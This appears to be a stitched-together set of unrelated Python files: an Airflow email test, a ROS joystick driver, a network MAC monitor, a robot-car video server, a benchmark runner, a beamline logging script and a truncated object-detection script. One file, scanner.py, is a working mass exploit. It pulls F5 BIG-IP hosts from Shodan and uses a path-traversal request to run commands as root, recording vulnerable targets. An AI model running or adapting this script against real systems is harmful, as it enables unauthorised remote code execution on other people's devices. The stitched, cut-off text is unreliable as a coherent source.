mock_smtp.return_value.login.assert_called_with( configuration.conf.get('smtp', 'SMTP_USER'), configuration.conf.get('smtp', 'SMTP_PASSWORD'), ) mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string()) self.assertTrue(mock_smtp.return_value.quit.called) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl): configuration.conf.set('smtp', 'SMTP_SSL', 'True') mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False) self.assertFalse(mock_smtp.called) mock_smtp_ssl.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl): configuration.conf.remove_option('smtp', 'SMTP_USER') configuration.conf.remove_option('smtp', 'SMTP_PASSWORD') mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False) self.assertFalse(mock_smtp_ssl.called) mock_smtp.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) self.assertFalse(mock_smtp.login.called) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl): utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True) self.assertFalse(mock_smtp.called) self.assertFalse(mock_smtp_ssl.called) if __name__ == '__main__': unittest.main()
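test_custom_backend above points [email] EMAIL_BACKEND at a bare callable, so any function accepting the keyword signature asserted there can act as a backend. A minimal sketch of such a stub; the function name and logging are illustrative assumptions, not anything Airflow ships:

import logging

def send_email_stub(to, subject, content, files=None, dryrun=False,
                    cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed'):
    # A do-nothing backend: record the call instead of talking to an SMTP server.
    # Point the [email] EMAIL_BACKEND option at this function's import path to use it.
    logging.info('email to=%s subject=%s dryrun=%s', to, subject, dryrun)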
crsf_drv.py
from dataclasses import dataclass from threading import Lock, Thread from typing import List from construct import Container from time import sleep, time from sensor_msgs.msg import Joy from .joy_publisher import JoyPublisher from serial import Serial from crsf_parser import CRSFParser, PacketsTypes, PacketValidationStatus import rospy @dataclass class CRSFConfiguration: """ CRSF driver configuration """ axis_map: List[int] buttons_map: List[int] serial_port: str serial_baudrate: int joy_message_rate: float failsafe_timeout: float failsafe_axis: List[float] failsafe_buttons: List[float] deadband: float def __repr__(self) -> str: ret = f"""configuration: axis_map:{self.axis_map} buttons_map:{self.buttons_map} serial: {self.serial_port} @ {self.serial_baudrate} joy message rate: {self.joy_message_rate} failsafe: timeout {self.failsafe_timeout}, axis[{self.failsafe_axis}] , buttons [{self.failsafe_buttons}] deadband: {self.deadband} """ return ret class CRSFDrv: """ CRSF Joy Driver implementaton """ def __init__(self, config: CRSFConfiguration, publisher: rospy.Publisher) -> None: self._config = config self._message_pub = publisher self._joy_publisher = JoyPublisher( self._config.axis_map, self._config.buttons_map, self._message_pub ) self._values_lock = Lock() self._last_values = None self._last_update_time: float = 0 self._is_running = True self._crsf_parser = CRSFParser(self.publish) self._publishing_thread = Thread(target=self._publishing_worker) def _set_failsafe(self) -> None: self._joy_publisher.publish( self._config.failsafe_axis, self._config.failsafe_buttons ) def _publishing_worker(self) -> None: try: previous_update = 0 while self._is_running: with self._values_lock: time_since_last_update = time() - self._last_update_time if time_since_last_update > self._config.failsafe_timeout: self._set_failsafe() else: if previous_update != self._last_update_time: previous_update = self._last_update_time self._joy_publisher.remap_and_publish(self._last_values) sleep(1.0 / self._config.joy_message_rate) finally: self._set_failsafe() self._is_running = False def adjust_channel(self, value: float) -> float: value = value if abs(value) > self._config.deadband else 0 value = max(-1.0, min(1.0, value)) return value def publish(self, packet: Container, status: PacketValidationStatus) -> None: if status == PacketValidationStatus.VALID: if packet.header.type == PacketsTypes.RC_CHANNELS_PACKED: with self._values_lock: # derived from CRSF spec Rev7, TICKS_TO_US(x) = ((x - 992) * 5 / 8 + 1500) channels = [ ((x - 992) * 10 / 8000) for x in packet.payload.channels ] channels = [self.adjust_channel(x) for x in channels] # Inversion is a temporary workaround as the parser return them reversed self._last_values = channels[::-1] self._last_update_time = time() else: rospy.logwarn_throttle( 5, f"received invalid data with status {status}, {packet}" ) def run(self) -> None: with Serial( self._config.serial_port, self._config.serial_baudrate, timeout=2 ) as ser: input_data = bytearray() self._is_running = True self._publishing_thread.start() while not rospy.is_shutdown(): values = ser.read(100) input_data.extend(values) self._crsf_parser.parse_stream(input_data) self._is_running = False self._publishing_thread.join()
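A quick worked check of the channel scaling used in publish() above. The 172/992/1811 tick values are the commonly quoted CRSF low/centre/high channel ticks and are an assumption here, not something the driver defines:

def ticks_to_normalized(x):
    # Same expression as in CRSFDrv.publish(): the centre tick 992 maps to 0.0
    # and +/-800 ticks map to +/-1.0, before adjust_channel() applies the
    # deadband and clamps to [-1, 1].
    return (x - 992) * 10 / 8000

for tick in (172, 992, 1811):
    print(tick, round(ticks_to_normalized(tick), 3))
# 172 -> -1.025, 992 -> 0.0, 1811 -> 1.024, which is why the clamp is needed.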
__init__.py
"""MAC address Monitoring daemon.""" import logging import logging.handlers import threading import signal import ipaddress import daemon import click import netifaces import scapy.all CONFIG = {} ADDRESSES = [] WORKERS = [] SHUTDOWN = threading.Event() logging.basicConfig(format='[%(levelname)-8s] %(message)s') logger = logging.getLogger(__name__) syslog_handler = logging.handlers.SysLogHandler(address='/dev/log') logger.addHandler(syslog_handler) interfaces = netifaces.interfaces() def get_address_list(): """Fetch and return a list of addresses.""" ans, unans = scapy.all.arping( net=CONFIG['address'], timeout=CONFIG['timeout'], verbose=-1 # Disable scapy's log output ) return [x[1].src for x in ans] def update_address_list(): """Perform an address list update.""" logger.debug('Starting address list update') global ADDRESSES ADDRESSES = get_address_list() logger.debug('Address list update completed [addresses=%s]', ADDRESSES) def perform_update_loop(): """Perform an address list update loop.""" while not SHUTDOWN.is_set(): update_address_list() SHUTDOWN.wait(CONFIG['interval']) def start_client(): """Start the monitoring client.""" # Register signal handlers signal.signal(signal.SIGINT, stop_client) signal.signal(signal.SIGTERM, stop_client) # Define workers global WORKERS WORKERS += [threading.Thread(target=perform_update_loop)] # Start all workers [x.start() for x in WORKERS] # Wait for shutdown SHUTDOWN.wait() def stop_client(signum, frame): """Stop the monitoring client.""" logger.debug('Received signal, shutting down [signal=%s]', signum) # Inform workers of shutdown SHUTDOWN.set() # Join all workers [x.join() for x in WORKERS] @click.command() @click.option('--debug/--no-debug', '-d', default=False, help='Enable or disable debug output.') @click.option('--daemon/--no-daemon', default=False, help='Enable or disable daemonizing.') @click.option('--timeout', '-t', default=5, help='Arping timeout.') @click.option('--interval', '-i', default=30, help='Polling interval.') @click.option('--interface', '-if', type=click.Choice(interfaces), help='Network interface to operate on.') @click.option('--address', '-a', help='Network address to operate on.') @click.pass_context def macmond(ctx, **kwargs): """MAC address Monitoring daemon.""" CONFIG.update(kwargs) logger.setLevel(logging.DEBUG if CONFIG['debug'] else logging.INFO) logger.debug('Starting program [config=%s]', CONFIG) if not CONFIG['address']: logger.debug('No network address set, falling back to given interface') if not CONFIG['interface']: logger.critical('No network address or interface set, exiting') ctx.exit(1) # Determine network address/netmask based on interface name logger.debug('Attempting to determine network address for interface [interface=%s]', CONFIG['interface']) addrs = netifaces.ifaddresses(CONFIG['interface']) if netifaces.AF_INET not in addrs: logger.critical('Could not find a valid address [interface=%s]', CONFIG['interface']) ctx.exit(1) net_addr = addrs[netifaces.AF_INET][0] CONFIG['address'] = str(ipaddress.ip_network('%s/%s' % (net_addr['addr'], net_addr['netmask']), strict=False)) logger.debug('Set network address based on interface [address=%s]', CONFIG['address']) if CONFIG['daemon']: logger.debug('Daemonizing program') with daemon.DaemonContext(files_preserve=[syslog_handler]): start_client() else: start_client()
rpi_main.py
#!/usr/bin/env python3 # Receive car control + Transmit video import cv2, imutils, socket, base64 from threading import Thread from communication import SerialTransceiver from utils import rescale import time tcp_server_address = ("192.168.0.119", 10001) udp_server_address = ("192.168.0.119", 10002) # tcp_server_address = ("127.0.0.1", 10001) # udp_server_address = ("127.0.0.1", 10002) tcp_buff_size = 1024 udp_buff_size = 65536 # max buffer size control_vec = [127,127,127] tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) udp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, udp_buff_size) def rx_tcp(): global control_vec print(f"Binding TCP server to {tcp_server_address}") tcp_server_socket.bind(tcp_server_address) tcp_server_socket.listen(1) client_socket, client_address = tcp_server_socket.accept() while True: data = client_socket.recv(tcp_buff_size) if len(data) == 3: control_vec = list(data) # print(f"Received {control_vec} from {client_address}") def tx_udp(): global control_vec print(f"Binding UDP server to {udp_server_address}") udp_server_socket.bind(udp_server_address) vid = cv2.VideoCapture(0) while True: init_msg, client_address = udp_server_socket.recvfrom(udp_buff_size) # receive init message print(f"Received init msg from {client_address}, starting video transmission...") WIDTH=400 while vid.isOpened(): _, frame = vid.read() frame = imutils.resize(frame, width=WIDTH) # if you want to reduce frame size _, buffer = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 80]) # compress image msg = base64.b64encode(buffer) # print(f"Encoding: frame({frame.shape[0]*frame.shape[1]*frame.shape[2]}) -> encoded({len(buffer)}) -> base64({len(msg)})") udp_server_socket.sendto(msg, client_address) cv2.putText(frame, str(control_vec), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2) cv2.imshow("TRANSMITTING VIDEO", frame) key = cv2.waitKey(1) & 0xFF if key == ord('q'): udp_server_socket.close() break def set_message(): global control_vec max_lin = 0.1 max_ang = 0.2 while not transceiver.is_stop: vx = rescale(control_vec[0], 0, 256, -max_lin, max_lin) vy = rescale(control_vec[1], 0, 256, -max_lin, max_lin) vt = rescale(control_vec[2], 0, 256, -max_ang, max_ang) vel = [vx, vy, vt] print(f"Set vel to {vel}") transceiver.set_msg(vel) time.sleep(0.1) # ----------------------- main loop ------------------------- transceiver = SerialTransceiver('/dev/ttyACM0', 38400) tcp_thread = Thread(target=rx_tcp) udp_thread = Thread(target=tx_udp) transform_thread = Thread(target=set_message) arduino_thread = Thread(target=transceiver.talk_arduino) tcp_thread.start() udp_thread.start() transform_thread.start() arduino_thread.start() tcp_thread.join() udp_thread.join() transceiver.stop() transform_thread.join() arduino_thread.join()
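rescale() is imported from a utils module that is not included here. Given how it is called (mapping the 0-255 control bytes onto symmetric velocity ranges), a plausible linear-remap implementation would look like the sketch below; this is an assumption about that helper, not its actual source:

def rescale(value, in_min, in_max, out_min, out_max):
    # Linearly remap value from [in_min, in_max] onto [out_min, out_max].
    return out_min + (value - in_min) * (out_max - out_min) / (in_max - in_min)

# The neutral control byte 127 then maps to (almost) zero velocity:
print(rescale(127, 0, 256, -0.1, 0.1))   # ~ -0.00078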
scanner.py
#!/usr/bin/env python3 import re import sys import requests from time import sleep from shodan import Shodan from datetime import datetime from threading import Thread, activeCount # Shodan API Key (change according to your Shodan API key) api_key = '' # Shodan search query search_query = 'http.title:"BIG-IP&reg;- Redirect"' def getTime(): now = datetime.now() return now.strftime('%H:%M:%S') def showInfo(message): print('[\033[1;94m{}\033[0;m] [*] {}'.format(getTime(), message)) def showFail(message): print('[\033[1;94m{}\033[0;m] [\033[1;91m-\033[0;m] \033[1;91m{}\033[0;m'.format(getTime(), message)) def showSuccess(message): print('[\033[1;94m{}\033[0;m] [\033[1;92m+\033[0;m] \033[1;92m{}\033[0;m'.format(getTime(), message)) def exit(message = None): try: if message is not None: showFail(message) if activeCount() > 1: showInfo('Killing all threads') while activeCount() > 1: sleep(0.001) showInfo('Exiting script') sys.exit() except KeyboardInterrupt: pass def check(ip, port): try: url1 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash' url2 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id' url3 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd' url4 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list' requests.get(url1.format(ip, port), verify=False, timeout=5) requests.get(url2.format(ip, port), verify=False, timeout=5) r = requests.get(url3.format(ip, port), verify=False, timeout=5) if 'uid=0(root)' in r.text: r = requests.get('https://{}:{}/tmui/login.jsp'.format(ip, port), verify=False, timeout=5) hostname = re.search(r'<p\stitle=\"(.*?)\">', r.text).group(1).strip().lower() showSuccess('{} : {} - {} is vulnerable!'.format(ip, port, hostname)) with open('result.txt', 'a+') as f: f.write('{}:{} - {}\n'.format(ip, port, hostname)) f.close() else: showFail('{} : {} is not vulnerable'.format(ip, port)) requests.get(url4.format(ip, port), verify=False, timeout=5) except KeyboardInterrupt: exit('User aborted!') except Exception as e: showFail('{} : {} is not vulnerable'.format(ip, port)) def main(): try: api = Shodan(api_key) showInfo('Querying from Shodan API') showInfo('Using query: {}'.format(search_query)) search = api.search_cursor(search_query) showInfo('Retrieved result from Shodan') showInfo('Starting scanning') for result in search: ip = result['ip_str'].strip() port = result['port'] th = Thread(target=check, args=(ip, port,)) th.daemon = True th.start() while activeCount() > 5: sleep(0.001) while activeCount() > 1: sleep(0.001) exit('Scan ended') except Exception as e: exit(e) if __name__ == '__main__': try: main() except KeyboardInterrupt: exit('User aborted!')
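The script above caps concurrency by spinning on threading.activeCount(); a ThreadPoolExecutor enforces the same bound without the polling loops. This is an alternative sketch, not how the script itself is written:

from concurrent.futures import ThreadPoolExecutor

def run_all(targets, worker, max_workers=5):
    # targets: iterable of (ip, port) pairs; worker: a callable like check(ip, port)
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for ip, port in targets:
            pool.submit(worker, ip, port)
    # The with-block only exits once every submitted task has finished.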
runner.py
from __future__ import print_function __true_print = print # noqa import argparse import datetime import docker import json import multiprocessing import numpy import os import psutil import requests import sys import threading import time def print(*args, **kwargs): # noqa __true_print(*args, **kwargs) sys.stdout.flush() from ann_benchmarks.datasets import get_dataset, DATASETS from ann_benchmarks.algorithms.definitions import (Definition, instantiate_algorithm, get_algorithm_name) from ann_benchmarks.distance import metrics, dataset_transform from ann_benchmarks.results import store_results def run_individual_query(algo, X_train, X_test, distance, count, run_count, batch): prepared_queries = \ (batch and hasattr(algo, "prepare_batch_query")) or \ ((not batch) and hasattr(algo, "prepare_query")) best_search_time = float('inf') for i in range(run_count): print('Run %d/%d...' % (i + 1, run_count)) # a bit dumb but can't be a scalar since of Python's scoping rules n_items_processed = [0] def single_query(v): if prepared_queries: algo.prepare_query(v, count) start = time.time() algo.run_prepared_query() total = (time.time() - start) candidates = algo.get_prepared_query_results() else: start = time.time() candidates = algo.query(v, count) total = (time.time() - start) candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in candidates] n_items_processed[0] += 1 if n_items_processed[0] % 1000 == 0: print('Processed %d/%d queries...' % (n_items_processed[0], len(X_test))) if len(candidates) > count: print('warning: algorithm %s returned %d results, but count' ' is only %d)' % (algo, len(candidates), count)) return (total, candidates) def batch_query(X): if prepared_queries: algo.prepare_batch_query(X, count) start = time.time() algo.run_batch_query() total = (time.time() - start) else: start = time.time() algo.batch_query(X, count) total = (time.time() - start) results = algo.get_batch_results() candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in single_results] for v, single_results in zip(X, results)] return [(total / float(len(X)), v) for v in candidates] if batch: results = batch_query(X_test) else: results = [single_query(x) for x in X_test] total_time = sum(time for time, _ in results) total_candidates = sum(len(candidates) for _, candidates in results) search_time = total_time / len(X_test) avg_candidates = total_candidates / len(X_test) best_search_time = min(best_search_time, search_time) verbose = hasattr(algo, "query_verbose") attrs = { "batch_mode": batch, "best_search_time": best_search_time, "candidates": avg_candidates, "expect_extra": verbose, "name": str(algo), "run_count": run_count, "distance": distance, "count": int(count) } additional = algo.get_additional() for k in additional: attrs[k] = additional[k] return (attrs, results) def run(definition, dataset, count, run_count, batch): algo = instantiate_algorithm(definition) assert not definition.query_argument_groups \ or hasattr(algo, "set_query_arguments"), """\ error: query argument groups have been specified for %s.%s(%s), but the \ algorithm instantiated from it does not implement the set_query_arguments \ function""" % (definition.module, definition.constructor, definition.arguments) D = get_dataset(dataset) X_train = numpy.array(D['train']) X_test = numpy.array(D['test']) distance = D.attrs['distance'] print('got a train set of size (%d * %d)' % X_train.shape) print('got %d queries' % len(X_test)) X_train = 
dataset_transform[distance](X_train) X_test = dataset_transform[distance](X_test) try: prepared_queries = False if hasattr(algo, "supports_prepared_queries"): prepared_queries = algo.supports_prepared_queries() t0 = time.time() memory_usage_before = algo.get_memory_usage() algo.fit(X_train) build_time = time.time() - t0 index_size = algo.get_memory_usage() - memory_usage_before print('Built index in', build_time) print('Index size: ', index_size) query_argument_groups = definition.query_argument_groups # Make sure that algorithms with no query argument groups still get run # once by providing them with a single, empty, harmless group if not query_argument_groups: query_argument_groups = [[]] for pos, query_arguments in enumerate(query_argument_groups, 1): print("Running query argument group %d of %d..." % (pos, len(query_argument_groups))) if query_arguments: algo.set_query_arguments(*query_arguments) descriptor, results = run_individual_query( algo, X_train, X_test, distance, count, run_count, batch) descriptor["build_time"] = build_time descriptor["index_size"] = index_size descriptor["algo"] = get_algorithm_name( definition.algorithm, batch) descriptor["dataset"] = dataset store_results(dataset, count, definition, query_arguments, descriptor, results, batch) finally: algo.done() def run_from_cmdline(): parser = argparse.ArgumentParser() parser.add_argument( '--dataset', choices=DATASETS.keys(), required=True) parser.add_argument( '--algorithm', required=True) parser.add_argument( '--module', required=True) parser.add_argument( '--constructor', required=True) parser.add_argument( '--count', required=True, type=int) parser.add_argument( '--runs', required=True, type=int) parser.add_argument( '--batch', action='store_true') parser.add_argument( 'build') parser.add_argument( 'queries', nargs='*', default=[]) args = parser.parse_args() algo_args = json.loads(args.build) query_args = [json.loads(q) for q in args.queries] definition = Definition( algorithm=args.algorithm, docker_tag=None, # not needed module=args.module, constructor=args.constructor, arguments=algo_args, query_argument_groups=query_args, disabled=False ) run(definition, args.dataset, args.count, args.runs, args.batch) def run_docker(definition, dataset, count, runs, timeout, batch, mem_limit=None): import colors # Think it doesn't work in Python 2 cmd = ['--dataset', dataset, '--algorithm', definition.algorithm, '--module', definition.module, '--constructor', definition.constructor, '--runs', str(runs), '--count', str(count)] if batch: cmd += ['--batch'] cmd.append(json.dumps(definition.arguments)) cmd += [json.dumps(qag) for qag in definition.query_argument_groups] print('Running command', cmd) client = docker.from_env() if mem_limit is None: mem_limit = psutil.virtual_memory().available print('Memory limit:', mem_limit) cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1) if not batch: # Limit to first cpu if not in batch mode cpu_limit = "0" print('Running on CPUs:', cpu_limit) container = client.containers.run( definition.docker_tag, cmd, volumes={ os.path.abspath('ann_benchmarks'): {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'}, os.path.abspath('data'): {'bind': '/home/app/data', 'mode': 'ro'}, os.path.abspath('results'): {'bind': '/home/app/results', 'mode': 'rw'}, }, cpuset_cpus=cpu_limit, mem_limit=mem_limit, detach=True) def stream_logs(): for line in container.logs(stream=True): print(colors.color(line.decode().rstrip(), fg='blue')) if sys.version_info >= (3, 0): t = threading.Thread(target=stream_logs, 
daemon=True)
    else:
        t = threading.Thread(target=stream_logs)
        t.daemon = True
    t.start()

    try:
        exit_code = container.wait(timeout=timeout)

        # Exit if the exit code is zero; otherwise dump the container logs and raise.
        if exit_code == 0:
            return
        elif exit_code is not None:
            print(colors.color(container.logs().decode(), fg='red'))
            raise Exception('Child process raised exception %d' % exit_code)
    finally:
        container.remove(force=True)
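The integer comparisons on exit_code above match the docker-py 2.x API; in the Docker SDK for Python 3.0+, Container.wait() returns a dict such as {'StatusCode': 0}. A version-tolerant helper might normalise the result first; a sketch assuming only those two return shapes:

def wait_exit_code(container, timeout):
    result = container.wait(timeout=timeout)
    # docker-py >= 3.0 returns e.g. {'StatusCode': 0, 'Error': None};
    # older releases return the status code directly as an int.
    if isinstance(result, dict):
        return result.get('StatusCode')
    return result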
50-save_log.py
import os import sys import shutil import inspect import time import subprocess import threading from datetime import datetime BlueskyMagics.positioners = motor_txm + motor_optics + motor_pzt + motor_lakeshore class Auto_Log_Save(object): """ Auto save the motor position into logfile (/NSLS2/xf18id1/DATA/Motor_position_log/) at 11pm everyday. """ def __init__(self, interval=1): self.interval = interval thread = threading.Thread(target=self.run, args=()) thread.daemon = True # Daemonize thread thread.start() # Start the execution def run(self): while True: now = datetime.now() if now.hour == 23: save_pos(print_flag=0, comment="routine record") time.sleep(80000) def save_pos(print_flag=0, comment=""): """ Get motor positions and save to file /NSLS2/xf18id1/DATA/Motor_position_log/ To print it out, set print_flag=1 """ class Tee(object): def __init__(self, *files): self.files = files def write(self, obj): for f in self.files: f.write(obj) f.flush() # If you want the output to be visible immediately def flush(self): for f in self.files: f.flush() now = datetime.now() year = np.str(now.year) mon = "{:02d}".format(now.month) day = "{:02d}".format(now.day) hour = "{:02d}".format(now.hour) minu = "{:02d}".format(now.minute) current_date = year + "-" + mon + "-" + day fn = ( "/NSLS2/xf18id1/DATA/Motor_position_log/log-" + current_date + "_" + hour + "-" + minu + ".log" ) f = open(fn, "w") """ original = sys.stdout sys.stdout = Tee(sys.stdout, f) print('\nsaved to file: {}'.format(fn)) sys.stdout = original """ wh_pos(comment) f.write("\n{0} {1}:{2}\n".format(current_date, hour, minu)) lines = wh_pos(comment, 0) f.write("\n".join(lines)) f.write("\n\nsaved to file: {}".format(fn)) f.close() print("\nsaved to file: {}".format(fn)) if print_flag: shutil.copyfile(fn, "/NSLS2/xf18id1/DATA/Motor_position_log/tmp.log") os.system( "lp -o cpi=20 -o lpi=10 -o media='letter' -d HP_Color_LaserJet_M553 /NSLS2/xf18id1/DATA/Motor_position_log/tmp.log" ) def wh_pos(comment="", print_on_screen=1): positioners = BlueskyMagics.positioners values = [] for p in positioners: try: values.append(p.position) except Exception as exc: values.append(exc) headers = [ "Positioner", "Value", "Unit", "Low Limit", "High Limit", "Offset", "Offset_dir", "Encoder Dial", "Encoder Cnt.", "Encoder Res", "Motor Res", "Motor Status", ] LINE_FMT = "{: <16} {: <12} {: <6} {: <12} {: <12} {: <12} {: <12} {: <14} {: <14} {: <14} {: <14} {: <12}" lines = [] lines.append(str(comment) + "\n") lines.append(LINE_FMT.format(*headers)) for p, v in zip(positioners, values): if not isinstance(v, Exception): try: prec = p.precision except Exception: prec = self.FMT_PREC value = np.round(v, decimals=prec) try: low_limit, high_limit = p.limits except Exception as exc: low_limit = high_limit = exc.__class__.__name__ else: low_limit = np.round(low_limit, decimals=prec) high_limit = np.round(high_limit, decimals=prec) try: offset = p.user_offset.get() except Exception as exc: offset = exc.__class__.__name__ else: offset = np.round(offset, decimals=prec) try: encoder = p.dial_readback.value counts = p.dial_counts.value encoder_res = p.encoder_res.value motor_res = p.motor_res.value motor_velocity = p.velocity.value motor_stat = p.motor_stat.value offset_dir = p.user_offset_dir.value motor_unit = p.motor_egu.value except Exception as exc: encoder = ( counts ) = ( motor_res ) = ( encoder_res ) = ( motor_velocity ) = ( motor_stat ) = motor_stat = offset_dir = motor_unit = exc.__class__.__name__ else: encoder = np.round(encoder, decimals=prec) counts = 
np.round(counts, decimals=prec) motor_stat = "Alarmed" if motor_stat else "Normal" motor_res = format(motor_res, ".5e") encoder_res = format(encoder_res, ".5e") motor_velocity = np.round(motor_velocity, decimals=prec) else: value = v.__class__.__name__ # e.g. 'DisconnectedError' low_limit = ( high_limit ) = ( offset ) = encoder = counts = motor_res = encoder_res = motor_velocity = "" # encoder, counts = get_encoder(p.prefix) # tmp = p.name.split('_') # pname = '' # for i in range(len(tmp)): # pname += tmp[i] # pname += '.' # pname = pname[:-1] if p.parent: len_dif = len(p.name) - len(p.parent.name) parent_name = p.parent.name child_name = p.name[-(len_dif - 1) :] pname = parent_name + "." + child_name lines.append( LINE_FMT.format( pname, value, motor_unit, low_limit, high_limit, offset, offset_dir, encoder, counts, encoder_res, motor_res, motor_stat, ) ) lines.append("\n##########\nPZT STATUS:\n") LINE_FMT = "{: <30} {: <11} {: <11} {: <11} {: <11} {: <11} {: <11}" PZT_header = [ "Positioner", "status", "position", "P_gain", "I_gain", "D_gain", "Bender_force", ] lines.append(LINE_FMT.format(*PZT_header)) # pzt_dcm_chi2 = pzt('XF:18IDA-OP{Mir:DCM-Ax:Chi2Fine}', name='pzt_dcm_chi2',) # pzt_dcm_th2 = pzt('XF:18IDA-OP{Mir:DCM-Ax:Th2Fine}', name='pzt_dcm_th2') # pzt_tm = pzt('XF:18IDA-OP{Mir:TM-Ax:Bender}', name='pzt_tm', flag=1) # pzt_cm = pzt('XF:18IDA-OP{Mir:CM-Ax:Bender}', name='pzt_cm', flag=1) pzt_motors = [pzt_dcm_chi2, pzt_dcm_th2, pzt_tm, pzt_cm] for p in pzt_motors: # pzt_motors is defined in 13-pzt.py pzt_pos = np.round(p.pos.get(), decimals=4) pzt_p_gain = np.round(p.p_gain.get(), decimals=4) pzt_i_gain = np.round(p.i_gain.get(), decimals=4) pzt_d_gain = np.round(p.d_gain.get(), decimals=4) lines.append( LINE_FMT.format( p.name, p.stat, pzt_pos, pzt_p_gain, pzt_i_gain, pzt_d_gain, p.bender ) ) if print_on_screen: print("\n".join(lines)) else: return lines pass """ def get_encoder(motor_prefix): ENCODER = str(motor_prefix) + '.DRBV' COUNTS = str(motor_prefix) + '.RRBV' encoder = subprocess.check_output(['caget', ENCODER, '-t']).rstrip() encoder = str_convert(encoder) counts = subprocess.check_output(['caget', COUNTS, '-t']).rstrip() counts = str_convert(counts) return encoder, round(float(counts)) def get_pzt_position(pzt_prefix, flag=''): POS = str(pzt_prefix) + 'GET_POSITION' STAT = str(pzt_prefix) + 'GET_SERVO_STATE' PGAIN = str(pzt_prefix) + 'GET_SERVO_PGAIN' IGAIN = str(pzt_prefix) + 'GET_SERVO_IGAIN' DGAIN = str(pzt_prefix) + 'GET_SERVO_DGAIN' BENDER = str(pzt_prefix) + 'W-I' pos = subprocess.check_output(['caget', POS, '-t']).rstrip() pos = str_convert(pos) stat = subprocess.check_output(['caget', STAT, '-t']).rstrip() stat = str_convert(stat, 0) P_gain = subprocess.check_output(['caget', PGAIN, '-t']).rstrip() P_gain = str_convert(P_gain) I_gain = subprocess.check_output(['caget', IGAIN, '-t']).rstrip() I_gain = str_convert(I_gain) D_gain = subprocess.check_output(['caget', DGAIN, '-t']).rstrip() D_gain = str_convert(D_gain) if flag: Bender_force = subprocess.check_output(['caget', BENDER, '-t']).rstrip() Bender_force = str_convert(Bender_force) else: Bender_force = 'N/A' return stat, pos, P_gain, I_gain, D_gain, Bender_force """ def str_convert(my_string, flag=1): tmp = str(my_string) fmt = "{:3.4f}" output = tmp[2 : len(tmp) - 1] if flag: return fmt.format(float(output)) else: return output
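Auto_Log_Save approximates "once a day at 23:00" by checking the current hour and then sleeping roughly 22 hours. An alternative sketch that sleeps until the next 23:00 explicitly; this illustrates the scheduling idea and is not the beamline's code:

from datetime import datetime, timedelta
import time

def seconds_until(hour=23):
    now = datetime.now()
    target = now.replace(hour=hour, minute=0, second=0, microsecond=0)
    if target <= now:
        target += timedelta(days=1)
    return (target - now).total_seconds()

def run_daily(task, hour=23):
    # Sleep until the next occurrence of `hour`, run the task, repeat.
    while True:
        time.sleep(seconds_until(hour))
        task()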
object_detection_multithreading.py
import os import cv2 import time import argparse import numpy as np import tensorflow as tf import zmq from queue import Queue from threading import Thread from multiprocessing import Process, Queue, Pool from utils.app_utils import FPS, WebcamVideoStream, draw_boxes_and_labels from object_detection.utils import label_map_util CWD_PATH = os.getcwd() # Path to frozen detection graph. This is the actual model that is used for the object detection. MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017' PATH_TO_CKPT = os.path.join(CWD_PATH, 'object_detection', MODEL_NAME, 'frozen_inference_graph.pb') # List of the strings that is used to add correct label for each box. PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data', 'mscoco_label_map.pbtxt') NUM_CLASSES = 90 # Loading label map label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True) category_index = label_map_util.create_category_index(categories) def detect_objects(image_np, sess, detection_graph): # Expand dimensions since the model expects images to have shape: [1, None, None, 3] image_np_expanded = np.expand_dims(image_np, axis=0) image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. scores = detection_graph.get_tensor_by_name('detection_scores:0') classes = detection_graph.get_tensor_by_name('detection_classes:0') num_detections = detection_graph.get_tensor_by_name('num_detections:0') # Actual detection. (boxes, scores, classes, num_detections) = sess.run( [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) # Visualization of the results of a detection. rect_points, class_names, class_colors = draw_boxes_and_labels( boxes=np.squeeze(boxes), classes=np.squeeze(classes).astype(np.int32), scores=np.squeeze(scores), category_index=category_index, min_score_thresh=.5 ) return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors) def worker(input_q, output_q): # Load a (frozen) 